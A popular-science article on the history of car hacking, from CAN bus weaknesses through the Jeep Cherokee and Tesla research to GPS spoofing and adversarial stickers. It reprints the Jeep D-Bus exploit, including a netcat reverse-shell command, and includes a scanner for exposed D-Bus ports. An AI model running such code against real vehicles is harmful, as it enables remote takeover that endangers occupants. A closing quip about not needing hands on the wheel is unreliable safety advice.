"Hold on tight to the steering wheel!" Who hacks smart cars, and how

Contents of the article
  • Architecture: CAN bus, ECUs, etc.
  • Scientists join the battle
  • Reason to think
  • Chris Valasek and Charlie Miller - legendary duo
  • A sad story about a jeep and an audio system
  • A gift of fate: a careless provider with a leaky network
  • Applied philosophy: safety in development and safety in use
  • Who rules Tesla?
  • Dangerous life hack
  • Sensors: how robots see the world
  • GPS: hello, where am I?
  • The Chinese room: what the autopilot is thinking
  • The neural network does not like noise
  • Human, all too human: the limitations of technology
  • Autonomy levels
  • How to stop worrying and love a smart car

Architecture: CAN bus, ECUs, etc.
Let's start with the architecture. The on-board computer of a modern car does not really exist as a single whole. Instead, there is a collection of electronic control units (ECUs) connected into a network. From the late 1980s to the present day, the so-called CAN bus has remained the basic standard for this network: stretches of twisted pair to which all ECUs transmit messages in the same format.

In reality, of course, things are a little more complicated. There may be more than one bus - for example, one for the more important, higher-speed devices and another for secondary ones, with some kind of "bridge" between the buses. And in its MEB platform for electric vehicles, Volkswagen is abandoning the CAN-bus architecture entirely in favor of onboard Ethernet and a unified Android-based operating system.

WWW
More about the data exchange format on the CAN bus can be found in our recent article, in our March 2015 issue, or on Wikipedia. And if you really want to study the subject in depth, there is a good book by a recognized specialist freely available.

For now, what matters is that no matter how "smart" a modern car is, the same bus lies at its heart. This means its fundamental, unfixable vulnerability is still relevant: by gaining access to CAN (for example, by plugging into the diagnostic connector or placing a sniffer on the bus), we gain access to all transmitted information. With all the ensuing consequences.

And if we can transmit our own signal to any of the ECUs, it will obediently execute the command. If it is the air-conditioner control unit, that is not so bad yet. But what if it is the brake or engine control unit? In the spirit of "garbage in, garbage out," a single wrong command, received in the middle of a hard overtake into the oncoming lane, can lead to sad consequences and loud newspaper headlines.

However, things are not quite so bad. Manufacturers are not stupid and are perfectly capable of building protection into each specific ECU. A unit may refuse to accept a command if it does not carry the correct checksum or does not meet some additional conditions. Very often, for example, you can impersonate a parking assistant only while the car is in reverse and moving no faster than five kilometers per hour - otherwise its signals are ignored.
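The gating logic an ECU might apply can be sketched roughly as follows. Everything here - the frame layout, the XOR checksum, the exact conditions - is invented for illustration; real ECUs use manufacturer-specific schemes.

```python
# Hypothetical sketch of how an ECU might gate a parking-assist
# steering command: checksum first, then vehicle-state conditions.
# Frame layout and checksum scheme are invented, not a real protocol.

def checksum(data: bytes) -> int:
    """Simple XOR checksum over the payload bytes."""
    c = 0
    for b in data:
        c ^= b
    return c

def accept_steering_command(frame: bytes, in_reverse: bool, speed_kmh: float) -> bool:
    """Accept the command only if the checksum matches and the car
    is actually in a state where parking assist makes sense."""
    payload, received_sum = frame[:-1], frame[-1]
    if checksum(payload) != received_sum:
        return False                      # corrupted or forged frame
    if not in_reverse or speed_kmh > 5:   # outside parking conditions
        return False
    return True

cmd = bytes([0x10, 0x22, 0x7F])           # arbitrary payload bytes
frame = cmd + bytes([checksum(cmd)])      # well-formed frame
```

An attacker who forges the checksum but sends the command at highway speed still gets rejected by the second check - which is exactly why researchers had to study the conditions, not just the message format.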

In addition, messages on the CAN bus are commands so low-level that they can be compared to machine code. To understand what a given bit sequence means, you will have to spend a long time reading the manufacturer's technical documentation or run full-scale experiments on a real car - or, for lack of one, on individual ECUs on a bench.
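To see why the documentation matters, here is a minimal sketch of decoding one such raw frame. The arbitration ID (0x1A0), the big-endian layout and the 0.01 km/h scaling are all invented stand-ins for the private encoding a manufacturer would actually define.

```python
import struct

# A raw CAN frame is just an arbitration ID plus up to 8 data bytes.
# What those bytes *mean* is defined privately by the manufacturer.
# The ID, byte layout and scaling below are an invented example.

def decode_wheel_speed(arb_id: int, data: bytes):
    """Return speed in km/h if this is the (hypothetical) wheel-speed
    frame, else None."""
    if arb_id != 0x1A0:
        return None
    raw, = struct.unpack(">H", data[:2])   # 16-bit big-endian counter
    return raw * 0.01                      # assumed scale factor

speed = decode_wheel_speed(0x1A0, bytes([0x13, 0x88, 0, 0, 0, 0, 0, 0]))
# 0x1388 == 5000, so about 50 km/h under the assumed scaling
```

Without the spec, an analyst staring at `13 88 00 00 00 00 00 00` has no way to know which bytes are the signal, what the byte order is, or what units apply - hence the "long reading or full-scale experiments."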

Scientists join the battle
An interesting situation emerges: in theory, hacking a car is very simple, but in practice it takes a great deal of meticulous preparation. And for a long time, it turned out, this was mainly done by people who stay in the shadows and have purely mercenary interests - not gaining control over a car's electronics, but getting the car itself into their hands.

The topic was first taken seriously only in 2010, when the IEEE Symposium on Security and Privacy featured a presentation by computer scientists from the University of California, San Diego and the University of Washington.

They described many extremely interesting features of automobiles as computer systems. Mostly, these features stemmed from the fact that the industry pays a great deal of attention to safety during normal use and in emergencies, but little to protecting the car's electronic systems from a targeted attack.

For example, so that the doors would not stay locked in an accident, the low-priority network containing the central-locking control unit had a "bridge" to the high-priority network, which carried the status sensors for the entire car and the units of various driver-"assistant" systems. Advanced telematics systems collected readings from many sensors and sent them to service centers over a cellular connection, so that the car could warn the owner in advance that a service visit was due, or call 911 on its own after an accident. Moreover, an anti-theft device could be part of the same system, allowing the engine to be blocked remotely.
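The role of such a "bridge" can be sketched in a few lines. The arbitration IDs and the forwarding rule below are invented for illustration; the point is that the same legitimately necessary link between segments is what an attacker can ride across.

```python
# Minimal sketch of a gateway bridging the high-priority bus (crash
# sensors, powertrain) and the low-priority bus (central locking,
# comfort electronics). IDs and the whitelist are hypothetical.

CRASH_STATUS_ID = 0x050      # "collision detected" frame (invented)
ENGINE_TORQUE_ID = 0x0A0     # powertrain chatter (invented)

# The lock unit legitimately needs crash frames, so the bridge
# forwards them across - and that necessary opening is exactly
# the kind of path an attacker looks for between segments.
FORWARD_TO_LOW = {CRASH_STATUS_ID}

def bridge_high_to_low(frames):
    """Forward only whitelisted frames onto the low-priority bus."""
    return [(fid, data) for fid, data in frames if fid in FORWARD_TO_LOW]

high_bus_traffic = [(ENGINE_TORQUE_ID, b"\x42"), (CRASH_STATUS_ID, b"\x01")]
reaches_lock_unit = bridge_high_to_low(high_bus_traffic)
```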

What exactly did this team of researchers do? To begin with, they wrote CARSHARK, a flexible tool for analyzing and injecting messages on the CAN bus. From there, great opportunities open up. Without going too deep into the technical details: those ECUs that had authentication at all were protected by only a 16-bit key. Such protection can be bypassed by brute force in a few days. After that you can, for example, reflash the ECU - and then do whatever you want.
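A toy simulation shows why a 16-bit key space is hopeless. The challenge-response function here is invented; real ECU seed/key algorithms differ, and on a real bus it is the message rate limit, not the computation, that stretches the search into days.

```python
# Toy illustration: an ECU "protected" by a 16-bit key can be
# brute-forced by simply trying all 65 536 candidates. The transform
# below is invented; real seed/key schemes vary by manufacturer.

SECRET_KEY = 0xBEEF          # unknown to the attacker

def ecu_response(seed: int, key: int) -> int:
    """Stand-in for the ECU's seed/key transform (hypothetical)."""
    return ((seed ^ key) + 0x1234) & 0xFFFF

def brute_force(seed: int, observed: int) -> int:
    """Try every possible 16-bit key until one reproduces the
    response observed on the bus."""
    for key in range(0x10000):
        if ecu_response(seed, key) == observed:
            return key
    raise ValueError("no key found")

seed = 0x1A2B
recovered = brute_force(seed, ecu_response(seed, SECRET_KEY))
```

On a desktop machine the loop finishes in milliseconds; only the ECU's limited response rate turns this into the "few days" the researchers reported.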

Significant harm can be done simply by arranging a classic DoS attack: a system overloaded with meaningless messages becomes inoperative. But it was also possible to play the hero of a hacker movie. As a simple and convincing demonstration of their power, the researchers wrote a "self-destruct" demo virus: once started, the car displayed a sixty-second countdown on the speedometer, blinked its turn signals and beeped in time with the passing seconds, then firmly shut off the engine and locked the doors, leaving the word PWNED on the speedometer.
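The DoS works because of how CAN arbitration resolves collisions: when several nodes transmit at once, the frame with the numerically lowest arbitration ID wins the bus. A toy model of that rule makes the starvation obvious.

```python
# Toy model of CAN arbitration. When transmissions collide, the frame
# with the lowest arbitration ID wins the round. A node flooding
# ID 0x000 therefore wins every single round, and legitimate frames
# never get through - a bus-level denial of service.

def arbitrate(pending):
    """Return the frame that wins the current arbitration round."""
    return min(pending, key=lambda frame: frame[0])

legit = [(0x1A0, b"wheel speed"), (0x3E0, b"climate")]
flood = (0x000, b"junk")

# Simulate 100 rounds in which the flooder always has a frame ready.
delivered = [arbitrate([flood] + legit) for _ in range(100)]
```

Every delivered frame is the flooder's: the wheel-speed and climate messages are starved indefinitely, with no need to understand what any of them mean.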

An even more insidious approach the researchers demonstrated was loading malicious code into the RAM of the telematics system (which ran a full-fledged Unix-like OS). They arranged for the code to fire on a trigger (for example, accelerating to a certain speed) and to reboot the system after firing, erasing itself. The perfect crime!

But the researchers didn't stop there. The next year, 2011, they presented a new report (PDF) that considered not what an attacker can do with the system once inside, but how exactly he can obtain that access in the first place.

Reason to think
In 2011, the researchers identified as an already realistic attack vector the computers that cars are connected to at service centers: they run Windows and often need Internet access. And as a theoretical vector, possible in the future, they named the "smart" chargers at electric-vehicle charging stations, which carry not only high current but also data.

Unlike their previous, highly specific paper, this one reads more like a gripping narrative about the triumphs and failures of engineering. Take the music track in WMA format that plays like ordinary music on a computer but, on the car's player, sends malicious packets to the CAN bus. Or the speculation about exactly how one might connect to a car via Bluetooth or through a telematics system's cellular link.

In other words, in this report the researchers mostly pointed to potential threats that resemble scripts for hacker movies - with the caveat that they actually carried all of it out in a laboratory setting rather than merely assuming such things were possible.

Chris Valasek and Charlie Miller - legendary duo
Well, after a team of researchers from two major universities had done all this, two guys in a garage managed to repeat their achievements - meet Chris Valasek and Charlie Miller.

They began by meticulously repeating their predecessors' research - and wrote a much more detailed and complete report. Its conclusions have already been mentioned several times in this article: a successful car hack requires a lot of painstaking preliminary work, which has its pitfalls. For example, if you study ECUs separately from the car, on a special test bench, they can (and will!) behave differently than they do in working conditions. But if all this work does not scare you off, then once you get access to the car, it will be clear what to do - and a lot can be done.

They then examined a couple of dozen specific car models, studying the details of their network architecture - and especially the possible vectors for a remote attack. It was at this stage that they singled out the so-called cyber-physical components: all kinds of driver assistants such as cruise control or LKA (Lane Keep Assist). These devices are at once the most attractive end goal for a hacker and important milestones on the road to a truly self-driving car.

Valasek and Miller found that, on the one hand, car manufacturers use different components and network architectures, but on the other hand, many entertainment systems use well-known solutions from common consumer electronics all the way to web browsers.

A sad story about a jeep and an audio system
But the main result of this stage of their labors was the choice of a target for the next step. They found a potentially interesting vulnerability in the 2014 Jeep Cherokee - and decided to tackle it seriously.

And their efforts were rewarded. The Jeep's dashboard was built around the Harman Uconnect entertainment system: a computer with a 32-bit ARM processor and the QNX operating system (a Unix-like commercial microkernel OS often used in such embedded systems). It combined an audio system, a radio, a navigator and applications - and it could also share Wi-Fi and had a 3G modem.

A scan of this access point's open ports showed that port 6667 was open, that it was used by the D-Bus interprocess communication system, and that accessing it required no password at all.
Code:
telnet 192.168.5.1 6667
Trying 192.168.5.1...
Connected to 192.168.5.1.
Escape character is '^]'.
AUTH ANONYMOUS
OK 4943a53752f52f82a9ea4e6e00000001
BEGIN

After that, one could simply run a short Python script to open a remote "root" access shell.
Code:
import dbus

bus_obj = dbus.bus.BusConnection("tcp:host=192.168.5.1,port=6667")
proxy_object = bus_obj.get_object('com.harman.service.NavTrailService', '/com/harman/service/NavTrailService')
playerengine_iface = dbus.Interface(proxy_object, dbus_interface='com.harman.ServiceIpc')
print(playerengine_iface.Invoke('execute', '{"cmd":"netcat -l -p 6666 | /bin/sh | netcat 192.168.5.109 6666"}'))

And, according to the hackers themselves, "further on this thing you can run any code you want."

A gift of fate: a careless provider with a leaky network
But the amazing discoveries do not end there. Port 6667 was reachable through any network interface, including the 3G modem. The hackers bought several femtocells on eBay - miniature Sprint Airave 2.0 access points - knowing these devices had an exploit allowing a Telnet connection to them. And indeed, when the car came within range of their femtocell, the hackers were able to connect to it. But that was not all: it turned out that any two devices connected to the Sprint network could communicate with each other anywhere in the United States.

By this point, the hackers had already established which IP ranges were allocated to cars on this network. It was enough to scan that range: any address with port 6667 open was the D-Bus interface of some car in the United States, and not necessarily a Cherokee. The researchers found several models with the port open and unauthenticated - and at this point in their paper they repeat several times that they did not inject anything into any of the vehicles they found, but merely documented the vulnerability.
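Technically, such a sweep amounts to nothing more than attempting TCP connections across an address range, which the standard library handles in a few lines. The sketch below is generic (no real addresses); needless to say, scanning networks you do not own is both unethical and illegal.

```python
import socket

def port_open(host: str, port: int, timeout: float = 0.5) -> bool:
    """True if a TCP connection to host:port succeeds within timeout."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False

def scan_for_dbus(hosts, port=6667):
    """Return the hosts in the given iterable that expose the port -
    in the Jeep story, an unauthenticated D-Bus endpoint."""
    return [h for h in hosts if port_open(h, port)]
```

Every hit in the researchers' sweep was a car somewhere in the country; the only "exploit" needed afterwards was the anonymous D-Bus session shown above.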

They could not establish exactly how many cars they could have hacked had they wanted to, and estimated a couple of hundred thousand. But when their study (PDF) was published, Chrysler recalled 1.4 million vehicles for safety reasons.

Applied philosophy: safety in development and safety in use
Chris Valasek and Charlie Miller worked long and hard and finally got their way - their Cherokee hack really became a sensation, after which car manufacturers finally began to listen to security experts.

The hackers managed to convince industry representatives that the same security principles matter for computerized cars as for the rest of electronics: design built on infosec best practices, close work with expert hackers and, most importantly, an understanding that "holes" should not be hushed up but promptly fixed with patches, preferably distributed centrally and requiring minimal effort from the user.

For example, some lazy and incurious Jeep driver may well have missed the warning about the problem, never made it to a service center, and left his car vulnerable. But a Tesla owner already receives security updates on his car just as he does on his phone or computer.

In addition, the duo of hackers separately noted an alarming trend: the more "cyber-physical components" a modern car has and the "smarter" it becomes, the more control over its behavior may be concentrated in a single ECU. Such a unit becomes a high-priority and critical target at the same time. After penetrating the car's on-board network, an attacker no longer has to puzzle over how different ECUs work together; he can focus on the one that most resembles an "autopilot" and find a way to deceive it specifically.

And if a car keeps getting smarter - if it has long been able to park on its own, hold speed and lane on the motorway, and prepare to brake when the car ahead starts closing the distance - then at what point does it become self-driving? And how far can you trust it?

This is not only a technical question but a philosophical one. Practice shows that modern automakers simultaneously praise the new functions of their products and strongly recommend that drivers keep their hands on the wheel and their eyes on the road, so as to retain the ability to intervene personally in an unforeseen situation. Alas, practice equally shows that drivers often ignore this reasonable advice.

Who rules Tesla?
Whenever a fancy Tesla gets into an accident, everyone talks loudly about its autopilot or its batteries, but pays far less attention to what the driver was doing before the crash. In several real cases the answer was "eating a bagel," "watching a movie," or simply "holding the steering wheel for no more than a couple of minutes out of an hour's drive." One unfortunate scenario repeats over and over: driving in the leftmost lane, the car ahead of the Tesla sees an obstacle and moves into the right lane... and the Tesla begins to accelerate, thinking the road has been yielded to it. The ending is all too predictable. In August of this year, just such an incident took place in Moscow.

And this happens because of how Tesla's sensors are designed and configured. Tesla uses neither lidar (a laser rangefinder) nor a preloaded map of the area: Elon Musk believes the former is too expensive and the latter does not give the desired flexibility.

Instead, Tesla relies on radar and camera readings, which a neural network processes. But radar is not very good at detecting stationary objects, and when it and the cameras give contradictory results, the conflict-resolution mechanism sometimes picks the wrong one. And the driver is not ready to intervene quickly and save the situation.

Dangerous life hack
Some experts argue that the problem is not only in the technical nuances but also in the fact that Elon Musk advertises his brainchild as a full-fledged autopilot. Tesla's manual says the driver must always be ready to take the wheel, but in promotional videos Musk himself clearly violates this rule, setting a bad and dangerous example for drivers.

Sensors: how robots see the world
The example above clearly shows that a car's degree of "smartness" depends, first, on the number and quality of the sensors installed on it and, second, on the design of the system that processes their signals. But every sensor is also a data-input channel, and it can have vulnerabilities of its own.

Here the same problem arises again: development focuses primarily on ordinary, everyday use cases rather than on countering targeted interference and attacks. And very often the algorithms for resolving conflicting signals are simply not designed with deception in mind. Just like in good old science fiction: the robots are smart, but gullible.

Back in 2013, hacker Zoz Brooks gave a talk (PDF) at DEF CON 21, in which he examined in great detail the prospects for attacks on autonomous vehicles - including self-driving cars, drones and even robotic submarines.

He examined the different types of sensors and control channels of such devices, dwelling on the strengths and weaknesses of each, and identified two attack paths common to all sensor types: jamming and signal spoofing.

The talk is full of fascinating details. It mentions a security manual written in Arabic (probably the materials of some group banned in the Russian Federation) that advises deceiving lidars with reflectors. It mentions fooling the wheel-revolution counter... by changing the wheels: if the wheel size differs from the specified one, the counter will lie. It also examines the weaknesses of map-based solutions, both preloaded and updated in real time.

GPS: hello, where am I?
Brooks's talk also has a lot to say about GPS spoofing. At the time it was still a little-studied but already hot topic: after all, it was presumably with the help of GPS deception that Iranian cyber troops managed to capture the secret US stealth drone RQ-170 Sentinel.

These days the technology is used everywhere. In 2017, twenty ships in the Black Sea near Gelendzhik observed a GPS deviation of more than 25 nautical miles. Drivers sometimes note similarly strange navigator readings when a motorcade of dignitaries sweeps past. And thanks to the rapidly falling cost of SDR technology (Software Defined Radio: a computer-controlled radio receiver and transmitter), such capabilities have become available to private individuals.

Just recently the technology company Regulus, which builds anti-spoofing solutions for satellite navigation, showed that a couple of devices and a budget of $600 are enough to steer a Tesla Model 3 somewhere its driver never intended. A false signal makes the autopilot think it is on its route and it is time to leave the highway - which sends the car onto the shoulder or into the oncoming lane. Any GPS-equipped device is vulnerable to such attacks, however: drones, inattentive drivers who trust their navigators, even the Pokemon GO game.

The Chinese room: what the autopilot is thinking
But all of that concerns the sensors, and with them, ultimately, everything is clear: there is no defense against brute force. In fog or dust, cameras and lidar see worse; they can also simply be taped over or blinded with a special emitter, as researchers from the Qihoo 360 laboratory did. But what about the part of the smart car that uses their readings? Can it be fooled?

Chinese hackers from the Keen Security Lab, sponsored by the mega-corporation Tencent, answer this question in detail. They evidently studied all the works described above very carefully and in 2016 decided to try their hand in this area. But unlike Charlie Miller and Chris Valasek, who were interested in various makes and models of cars, this group focused from the start exclusively on Tesla electric vehicles.

Their reports are dry and full of technical detail, but read carefully, they make clear that the most interesting thing about the research is not the external display of "hacking" but the volume and quality of the work done (along with a strong sense of déjà vu: many of the vulnerabilities they exploited recall the work of Charlie Miller and Chris Valasek, and it is surprising that those recipes are still relevant).

The members of the Keen Security Lab team proved to be true masters of reverse engineering. They came a long way to show off, in 2016, a Tesla trunk that opens on their command and mirrors that fold at their will - a rogue Wi-Fi hotspot and vulnerabilities in the web browser of the on-board entertainment system were just the beginning.

Most importantly, having penetrated the system through this "hole," they eventually reprogrammed the Gateway component (the bridge between different parts of the on-board network) and thus gained access to the CAN bus. After that they dug into the car's various cyber-physical components - and in 2018 released a new report on how they obtained "root" access to the autopilot (bypassing, along the way, protection that had been improved after their previous report). That let them study its internals in detail, which became their most recent report, in 2019 (PDF).

Thanks to "root" access they were able to run the autopilot in debug mode and investigate exactly how it processes data from the cameras and other sensors. In particular, they found that several tasks at once - tracking objects, building a map of the surroundings, even detecting rain - are handled at the final stage by a single neural network.

The neural network does not like noise
What the Keen Security Lab researchers did next looks rather mundane (the car turns on its windshield wipers when it is not raining), but at its core it borders on art and science fiction. To better understand how the autopilot works, they practiced on the part of the neural network that recognizes rain and issues the command to turn on the wipers. And they got results!

After examining the images the wiper network works with, they applied the method of adversarial examples to it: perturbations were overlaid on the camera photographs that look insignificant to the human eye. Fed such a photo, the neural network became convinced that the probability of rain was high and turned on the wipers. And all this was done not on a neural network they had programmed themselves, but on a commercial product in whose development they took no part.
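The core idea can be shown on a toy model. Below, an invented one-layer "rain score" classifier stands in for the real network; the perturbation is aligned with the sign of the gradient of the score, so every "pixel" changes by only 0.2, yet the decision flips. This is only an illustration of the principle, not Tesla's network or Keen's actual method.

```python
import math
import random

# Invented stand-in for an "is it raining?" classifier: a single
# linear layer followed by a sigmoid. Real networks are far larger,
# but the adversarial trick works the same way in principle.
random.seed(0)
w = [random.gauss(0, 1) for _ in range(64)]   # "pixel" weights (invented)
b = -2.0                                      # bias toward "no rain"

def rain_probability(x):
    score = sum(wi * xi for wi, xi in zip(w, x)) + b
    return 1.0 / (1.0 + math.exp(-score))

x_dry = [0.0] * 64                 # a clearly "dry" image

# The gradient of the score with respect to x is simply w, so we
# nudge each pixel by eps in the direction of sign(w): a tiny,
# visually insignificant change per pixel.
eps = 0.2
x_adv = [xi + eps * math.copysign(1.0, wi) for xi, wi in zip(x_dry, w)]

p_before = rain_probability(x_dry)   # low: no rain detected
p_after = rain_probability(x_adv)    # high: classifier now "sees" rain
```

Because all 64 tiny nudges push the score in the same direction, their effect accumulates, which is exactly why perturbations invisible to a human can flip a network's verdict.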

Keen Security's employees then showed that it was enough to overlay the noise on only part of the camera's field of view for the effect to trigger. And then they carried the effect into the real world: by displaying a noise-bearing picture on a TV screen within the car cameras' field of view, they forced the wipers to turn on. After that, they tested the same principles on the task of recognizing road markings.

It turned out that stickers on the road can confuse the autopilot so that it misses a marking line, even though the stickers are plainly visible to the naked eye (the researchers note that the autopilot's neural network was trained, among other things, on examples with half-erased or partially covered markings). Then they tried the inverse problem: with other, much smaller stickers, they made the neural network see marking lines where there were none - for example, at an intersection, where such phantom markings can lead a car into oncoming traffic. The researchers argue that although they worked all this out on a car to which they had unlimited access, the tricks themselves should work on a car whose software has not been modified at all.

Human, all too human: the limitations of technology
In principle, all of the above is already enough for some conclusions. But for the sake of completeness, I would like to mention a few more things.

Note that the largest players in the self-driving market stick to map-based solutions and test their products in specific cities (or even on proving grounds). This makes the autopilot's job much easier: the maps can include the locations of road signs, points of special importance and, of course, the terrain, known obstacles and simply the traffic patterns. It is no accident that a Yandex division is working on a Russian analogue of Google's Waymo: its huge trove of maps and panoramas will be a great help. Navigating completely unfamiliar terrain is still the province of DARPA challenge winners and ambitious startups.

Remember, too, that with the exception of individual publicity demos, most self-driving cars still have a safety driver behind the wheel. And manufacturers are in no hurry to publish statistics on how often that driver's intervention becomes necessary - because it happens more often than they would like.

Autonomy levels
SAE International (formerly the Society of Automotive Engineers) defines a vehicle's degree of autonomy on a scale from 0 to 5. On this scale, Tesla rates as a representative of level 2: the automation controls speed and direction, but the driver must be ready to intervene at any moment. An ordinary parking assistant, incidentally, also falls into this category.
The next, third level implies that the automation fully controls the vehicle, but only under severely limited conditions - for example, on a high-speed highway with no intersections.
Level 4 in theory no longer requires a person behind the wheel, but again only under strictly defined conditions, such as driving within a predetermined area. Waymo's cars are at this level.
The fifth level - when the person finally becomes a passenger and the car can drive under unrestricted conditions - has not yet been achieved by any project.

How to stop worrying and love a smart car
So what is the bottom line? The same as with many other members of the "Internet of things." The more complex the system, the more potential vulnerabilities it has, and its best-protected elements can be bypassed by attacking the more vulnerable ones. Borrowing ready-made solutions from adjacent fields of electronics, designers forget that those solutions may bring their own problems. And finally there is the human factor: vigilance dulls when the system handles simple tasks over and over, and no one is ready for its error in a difficult situation.

Be vigilant and careful, both on the road and on the Internet. Do not scold the robots in vain - they are still learning - but do not trust them one hundred percent in critical, life-and-death matters either.

And if, after reading this article, you want not to move into an old Zhiguli with none of this electronics but, on the contrary, to explore it firsthand, take a look at George Hotz's project comma.ai: a fully open-source car autopilot with relatively cheap electronics that can easily be installed in many modern cars. It comes out much cheaper than a Tesla and is far more interesting: at your service are an extensive community of enthusiasts, a dedicated wiki and a detailed, engaging developers' blog. And you don't even have to keep your hands on the wheel.

But looking at the road ahead and thinking about what you are doing is still necessary.
 